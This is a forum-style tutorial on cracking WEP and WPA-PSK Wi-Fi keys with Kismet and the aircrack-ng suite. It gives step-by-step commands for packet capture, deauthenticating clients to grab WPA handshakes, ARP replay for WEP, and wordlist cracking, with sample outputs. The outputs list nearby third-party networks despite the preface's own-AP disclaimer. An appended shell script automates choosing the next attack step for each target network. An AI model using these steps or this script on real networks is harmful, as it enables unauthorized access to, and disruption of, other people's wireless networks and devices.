------------------| Preface |-----------------------
This guide is continuously updated as the various tests and the various error cases encountered when cracking WEP/WPA come up.
The always up-to-date tutorial can be found here
Remember that the tests were carried out on APs set up specifically for these tests, and that reproducing this on other people's APs is illegal.
Author: Langy ( www.googlebig.com )
----------------------------------------------------------
What is aircrack:
Code:
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.
Download / Install aircrack-ng (Debian/Ubuntu package):
Code:
langy@googlebig:~$ sudo apt-get install aircrack-ng
or build it from source (needs a C toolchain and the OpenSSL development headers, e.g. build-essential and libssl-dev):
Code:
wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
tar -zxvf aircrack-ng-1.0-rc1.tar.gz
cd aircrack-ng-1.0-rc1
make
sudo make install   # installing system-wide needs root
The Aircrack-ng suite includes these tools:
Code:
aircrack-ng airdriver-ng airmon-ng airolib-ng airtun-ng
airdecap-ng aireplay-ng airodump-ng airserv-ng
In this WEP/WPA-PSK cracking example we will use:
1) Kismet (wireless network detector)
2) airodump-ng (sniffs packets and writes the capture file)
3) aireplay-ng (injects frames)
4) aircrack-ng (recovers the key from the sniffed packets: statistical PTW/KoreK attacks on WEP IVs, dictionary attack on a WPA-PSK handshake)
------------------------------------------------------------------------------
[size=x-large]1) Kismet (Wireless network detector)[/size]
Download / Install Kismet (Debian/Ubuntu package):
Code:
langy@googlebig:~$ sudo apt-get install kismet
Start Kismet:
Code:
langy@googlebig:~$ sudo kismet
With Kismet we can see all wireless networks in range, together with the information we need for the next steps (connected clients, channel, SSID, etc.). Kismet needs its capture source (the wireless interface) configured in kismet.conf before it will start.
[size=x-large]2) airodump-ng (Sniffing packets)[/size]
airodump-ng --channel <channel> --bssid <bssid> --write <file> <interface>
The interface must be in monitor mode first (airmon-ng start wlan0 creates a monitor interface such as mon0). --channel locks the card on the AP's channel so no frames are missed while hopping, and --bssid restricts the capture to the target AP. Note that airodump-ng's BSSID filter is --bssid (or -d), not -b, which selects the band.
Example (no BSSID filter, so every AP on channel 11 is captured):
Code:
langy@googlebig:~$ sudo airodump-ng --channel 11 wlan0 --write testsnif
CH 11 ][ Elapsed: 8 mins ][ 2008-10-06 22:28

 BSSID            PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 XX:69:31:1E        0   0        0      0    0  11  48   WEP  WEP         A
 XX:62:33:30        0  90     4933  18187   32  11  54.  WPA  TKIP   PSK  N
 XX:40:6F:BC       -1   0        0    646    0  11  -1   OPN              <

 BSSID            STATION      PWR  Rate   Lost  Packets  Probes
 XX:62:33:30      XX:8F:DA:FA   -1  36- 0     0    17845
 (not associated) XX:32:52:40    0   0- 1     0       97  default,DLINK
 (not associated) XX:12:78:50    0   0- 1     0       49
 (not associated) XX:9D:CA:32    0   0- 1     0       36  HotSpot Resid
 (not associated) XX:A2:2C:CC    0   0- 1     0       12
 (not associated) XX:4B:B0:FC    0   0- 1     0       56  HotSpot Resid
 (not associated) XX:02:ED:70    0   0- 1     0       15  HotSpot Resid
 (not associated) XX:2C:DB:D3    0   0- 1     0        5  3Com
 XX:40:6F:BC      XX:8E:F4:78    0   0- 1     0      761  foti
This capture is written to testsnif-01.cap (the --write prefix plus a counter that increments on every run) in the current directory, here the home folder.
[size=x-large]3) aireplay-ng (is used to inject frames)[/size]
aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <interface>
-0 1 sends one deauthentication frame to the client; when the client re-associates, the WPA 4-way handshake goes over the air and airodump-ng records it, so this is how we obtain the handshake packets. It only helps against WPA-PSK: a WEP key is recovered from a large number of IVs, not from a handshake, and for that aireplay-ng's ARP request replay (-3, usually after a fake authentication with -1) is used to make the AP generate encrypted traffic quickly.
aireplay-ng is run at the same time as airodump-ng, on the same channel!
[size=x-large]4) aircrack-ng (Recovering the key from the sniffed packets)[/size]
aircrack-ng -w <wordlist> -b <bssid> <file.cap>
The wordlist (-w) is only used for WPA-PSK, where aircrack-ng tries every candidate passphrase against the captured handshake; for a WEP target it runs the PTW/KoreK statistical attacks on the captured IVs instead (see the second output below, where a wordlist is given but a PTW attack is started). -b selects the target BSSID; without it aircrack-ng asks interactively, as in the outputs below.
You can find a good wordlist on the St4ck website
Download: wordlist.zip
Example of a failed run: no WPA handshake in the capture:
Code:
langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap
Opening /home/langy/testsnif-01.cap
Read 45077 packets.
# BSSID ESSID Encryption
1 XX:62:33:30 NETGEAR WPA (0 handshake)
2 XX:40:6F:BC None (192.168.2.5)
3 XX:F0:85:58 dado No data - WEP or WPA
4 XX:69:31:1E Alice-382XXXX No data - WEP or WPA
Index number of target network ? 1
Opening /home/langy/testsnif-01.cap
No valid WPA handshakes found..
Quitting aircrack-ng...
langy@googlebig:~$
Example of a failed run: not enough IVs for the WEP PTW attack (aircrack-ng restarts on its own every 5000 new IVs; PTW normally needs tens of thousands of IVs to succeed):
Code:
langy@googlebig:~$ aircrack-ng -w /media/dati/H4ck1n9/all.txt /home/langy/*.cap
Opening /home/langy/test2snif-01.cap
Opening /home/langy/test3snif-01.cap
Opening /home/langy/test4snif-01.cap
Opening /home/langy/testing_snif-01.cap
Opening /home/langy/testsnif-01.cap
Read 192412 packets.
# BSSID ESSID Encryption
1 XX:62:33:30 NETGEAR WPA (0 handshake)
2 XX:00:3C:A5 HotSpot Residence None (0.0.0.0)
3 XX:69:31:1E Alice-382XXXX No data - WEP or WPA
4 XX:56:66:F0 TESTING CENTER WEP (7340 IVs)
5 XX:D4:46:60 No data - WEP or WPA
6 XX:6D:92:D0 Unknown
7 XX:40:6F:BC None (192.168.2.5)
8 XX:F0:85:58 dado No data - WEP or WPA
Index number of target network ? 4
Opening /home/langy/test2snif-01.cap
Opening /home/langy/test3snif-01.cap
Opening /home/langy/test4snif-01.cap
Opening /home/langy/testing_snif-01.cap
Opening /home/langy/testsnif-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 2677 ivs.
Aircrack-ng 1.0 beta1
[00:00:58] Tested 167049 keys (got 2677 IVs)
KB depth byte(vote)
0 55/ 56 FC(3328) 02(3072) 0F(3072) 12(3072) 13(3072)
1 9/ 15 03(4352) 23(4096) 2A(4096) 5D(4096) 88(4096)
2 1/ 2 5F(5120) AE(4352) C4(4352) 05(4096) 0E(4096)
3 12/ 3 ED(4096) 05(3840) 27(3840) 2A(3840) 32(3840)
4 17/ 4 C1(4352) 73(4096) FC(4096) 29(3840) 50(3840)
Failed. Next try with 5000 IVs.
Quitting aircrack-ng...
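As an added example (not code from the original post), the helpers below wrap the four steps above into shell functions and turn the aircrack-ng summary rows shown in the two failed runs into a next-step decision: deauth again for a WPA network with 0 handshakes, keep ARP-replaying for a WEP network with too few IVs, start the crack otherwise. The interface names, the client and own MAC addresses, the output prefix and the 40000-IV threshold are assumptions; the sample rows are constructed from the output shown above.

```shell
#!/bin/sh
# Added example, not from the original post. Helpers around the
# airodump-ng / aireplay-ng / aircrack-ng steps, plus a classifier for
# the "# BSSID ESSID Encryption" table that aircrack-ng prints.
# Interface names, MACs and the IV threshold below are assumptions.

# Capture command. The BSSID filter is --bssid (not -b); the interface
# must already be in monitor mode (airmon-ng start wlan0 -> mon0).
airodump_cmd() {
    # $1 channel, $2 bssid, $3 monitor interface, $4 output prefix
    printf 'airodump-ng --channel %s --bssid %s --write %s %s' "$1" "$2" "$4" "$3"
}

# WPA-PSK: one deauth against a single client so it re-associates and
# the 4-way handshake lands in the capture.
deauth_cmd() {
    # $1 bssid, $2 client mac, $3 monitor interface
    printf 'aireplay-ng -0 1 -a %s -c %s %s' "$1" "$2" "$3"
}

# WEP: fake-authenticate, then replay ARP requests to generate IVs fast
# (a deauth does nothing towards a WEP key).
wep_replay_cmds() {
    # $1 bssid, $2 our mac, $3 monitor interface
    printf 'aireplay-ng -1 0 -a %s -h %s %s\n' "$1" "$2" "$3"
    printf 'aireplay-ng -3 -b %s -h %s %s\n' "$1" "$2" "$3"
}

# Classify one row of aircrack-ng's network table.
# Prints: handshake | no-handshake | wep:<ivs> | nodata | other
classify_summary_line() {
    case $1 in
        *"WPA (0 handshake)"*)    echo no-handshake ;;
        *"WPA ("*" handshake)"*)  echo handshake ;;
        *"WEP ("*" IVs)"*)
            echo "wep:$(printf '%s\n' "$1" | sed -n 's/.*WEP (\([0-9]*\) IVs).*/\1/p')" ;;
        *"No data - WEP or WPA"*) echo nodata ;;
        *)                        echo other ;;
    esac
}

# Next action for a row. PTW needs tens of thousands of IVs to be
# reliable; 40000 is an assumed threshold, not a hard rule.
next_action() {
    cls=$(classify_summary_line "$1")
    case $cls in
        handshake)    echo crack ;;
        no-handshake) echo deauth ;;
        wep:*)        [ "${cls#wep:}" -ge 40000 ] && echo crack || echo replay ;;
        nodata)       echo capture ;;
        *)            echo skip ;;
    esac
}

# Demo over rows constructed from the output shown in this post.
if [ "${1:-}" = "--demo" ]; then
    for row in '1 XX:62:33:30 NETGEAR WPA (0 handshake)' \
               '4 XX:56:66:F0 TESTING CENTER WEP (7340 IVs)' \
               '3 XX:F0:85:58 dado No data - WEP or WPA'; do
        printf '%-8s %s\n' "$(next_action "$row")" "$row"
    done
fi
```

Run it as `sh audit.sh --demo` to see the decision for each sample row; in a real session the command strings returned by airodump_cmd, deauth_cmd and wep_replay_cmds are what you type (with sudo) in separate terminals, and the classifier is fed the table aircrack-ng prints when run without -b.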